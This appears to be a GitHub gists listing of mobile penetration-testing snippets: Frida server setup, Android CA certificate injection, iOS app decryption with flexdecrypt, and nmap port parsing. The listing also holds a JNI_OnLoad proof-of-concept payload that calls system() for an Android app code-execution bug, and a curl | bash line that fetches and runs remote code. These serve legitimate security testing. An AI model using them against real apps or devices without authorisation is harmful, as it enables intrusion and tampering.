-
Update the packages on your device:
pkg update -y && pkg upgrade -y
Abhineet Jayaraj interference-security
interference-security
/ frida-tools-termux.md
Created
November 27, 2023 07:21
interference-security
/ flexdump
Created
November 22, 2021 18:54
— forked from defparam/flexdump
Flexdump - A script that wraps flexdecrypt to dump, decrypt, re-sign, re-package iOS apps
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Copyright 2021 Evan Custodio (@defparam) | |
| # | |
| # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), | |
| # to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, | |
| # and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: | |
| # | |
| # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. | |
| # | |
| # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, |
interference-security
/ android-ssl-cert-install.md
Last active
May 25, 2023 16:23
Android SSL Certificate Installation
openssl x509 -inform DER -in cacert.der -out cacert.pem
openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1
mv cacert.pem <hash>.0
adb push <hash>.0 /sdcard/Download/
adb shell
su
mkdir -m 700 /sdcard/cert/
cp /system/etc/security/cacerts/* /sdcard/cert/
mount -t tmpfs tmpfs /system/etc/security/cacerts
interference-security
/ flexdecrypt-dump.md
Last active
June 26, 2021 02:04
Decrypt iOS app to generate IPA using Flexdecrypt
wget https://github.com/JohnCoates/flexdecrypt/releases/download/1.1/flexdecrypt.deb
dpkg -i flexdecrypt.deb
rm flexdecrypt.deb
wget https://gist.githubusercontent.com/defparam/71d67ee738341559c35c684d659d40ac/raw/30c7612262f1faf7871ba8e32fbe29c0f3ef9e27/flexdump -P /usr/local/bin
chmod +x /usr/local/bin/flexdump
flexdump --help
mount -o rw,remount /vendor
copy /sdcard/Download/frida-server /vendor/bin/
chmod 700 /vendor/bin/frida-server
setprop ctl.start fridaserver
interference-security
/ jni_onload_library.txt
Created
October 5, 2020 22:57
jni_onload library code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Source: https://medium.com/@dPhoeniixx/arbitrary-code-execution-on-facebook-for-android-through-download-feature-fb6826e33e0f | |
| #include <jni.h> | |
| #include <string> | |
| #include <stdlib.h> | |
| JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) | |
| { | |
| system("id > /sdcard/PoC"); | |
| return JNI_VERSION_1_6; | |
| } |
interference-security
/ run-external-executable-ios.md
Created
September 30, 2020 20:08
Running third-party executables on iOS
iDevice:~ root#ldid -e `which bash` > ent.xml
iDevice:~ root# cat ent.xml
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>platform-application</key>
<true/>
com.apple.private.security.no-container
cat filename.nmap | grep -i "/tcp" | cut -d "/" -f1 | sort | uniq | tr '\n' ',' ; echo ""
Linux: grep -i ".*/tcp.*open.*" filename.nmap | cut -d "/" -f1 | sort -u -n | tr "\n" "," | sed 's/,$//'
Windows: grep -i ".*/tcp.*open.*" filename.nmap | cut -d "/" -f1 | sort2 -u -n | tr -s "\r\n" "," | sed "s/,$//"
Powershell: Select-String -Path .\filename.nmap -Pattern ".*/tcp.*open.*" | Select-Object -ExpandProperty Line | %{$_.Split('/')[0]} | Sort-Object -Unique | %{$_.replace("`r","a")}
interference-security
/ writable-avd.md
Last active
April 28, 2024 06:44
How to make AVD system and file-system writable?
Source: https://www.linkedin.com/pulse/android-emulator-tips-security-testers-divya-mudgal/
emulator -list-avds
emulator -avd Pixel_3_XL_API_26 -writable-system
interference-security
/ frida-server-ios-all-interfaces.sh
Last active
July 3, 2022 16:53
Run iOS frida-server on all interfaces
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Install curl using Cydia before using the next command | |
| # /bin/bash -c "$(curl -fsSL https://gist.githubusercontent.com/interference-security/68faea1f4a445a7814cc2518a7d1c416/raw/c715dbc30397762239b3bf2d76c60859a5c83625/frida-server-ios-all-interfaces.sh)" | |
| launchctl unload -w /Library/LaunchDaemons/re.frida.server.plist | |
| cat >/Library/LaunchDaemons/re.frida.server.plist <<EOL | |
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
| <plist version="1.0"> | |
| <dict> | |
| <key>Label</key> | |
| <string>re.frida.server</string> |
NewerOlder